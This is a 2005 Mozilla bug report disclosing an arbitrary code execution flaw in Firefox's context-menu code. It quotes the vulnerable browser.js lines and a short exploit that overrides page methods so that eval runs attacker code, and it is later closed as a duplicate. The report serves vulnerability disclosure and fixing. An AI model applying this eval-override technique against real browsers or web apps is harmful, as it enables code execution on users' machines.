Closed
Bug 289078
Opened 20 years ago
Closed 20 years ago
security hole in nsContextMenu.setTarget()
Categories
(Core :: Security, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 289074
People
(Reporter: moz_bug_r_a4, Assigned: dveditz)
References
Details
(Whiteboard: [sg:dupe 289074])
Attachments
(1 file)
(deleted),
text/html
|
Details |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319
Vulnerability: arbitrary code execution
Vulnerable code:
from nsContextMenu.prototype.setTarget() in browser.js
if ( this.target.nodeType == Node.ELEMENT_NODE ) {
if ( this.target.localName.toUpperCase() == "IMG" ) {
this.onImage = true;
this.imageURL = this.target.src;
// Look for image map.
var mapName = this.target.getAttribute( "usemap" );
if ( mapName ) {
// Find map.
var map = this.target.ownerDocument.getElementById( mapName.substr(1) );
Exploit:
Web pages can overwrite the getAttribute and getElementById methods, such as
the following.
document.images[0].getAttribute = function() {
return { substr : function() { return MALICIOUS_CODE; } };
};
document.getElementById = eval;
I have confirmed that the following testcase works in:
[Firefox]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317
Firefox/1.0.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050404
Firefox/1.0.3
[Mozilla Suite]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050404
Reproducible: Always
Steps to Reproduce:
Reporter | ||
Comment 1•20 years ago
|
||
Updated•20 years ago
|
Status: UNCONFIRMED → NEW
Ever confirmed: true
Updated•20 years ago
|
Flags: blocking1.7.7?
Flags: blocking-aviary1.0.3?
Comment 2•20 years ago
|
||
Note that the testcase doesn't seem to exploit on trunk gecko.
Comment 3•20 years ago
|
||
Same eval problem as reported in bug 289074.
*** This bug has been marked as a duplicate of 289074 ***
*** This bug has been marked as a duplicate of 289074 ***
Status: NEW → RESOLVED
Closed: 20 years ago
Resolution: --- → DUPLICATE
Assignee | ||
Updated•20 years ago
|
Whiteboard: [sg:dupe 289074]
Updated•20 years ago
|
Flags: blocking1.7.7?
Flags: blocking-aviary1.0.3?
Assignee | ||
Updated•20 years ago
|
Group: security
You need to log in
before you can comment on or make changes to this bug.
Description
•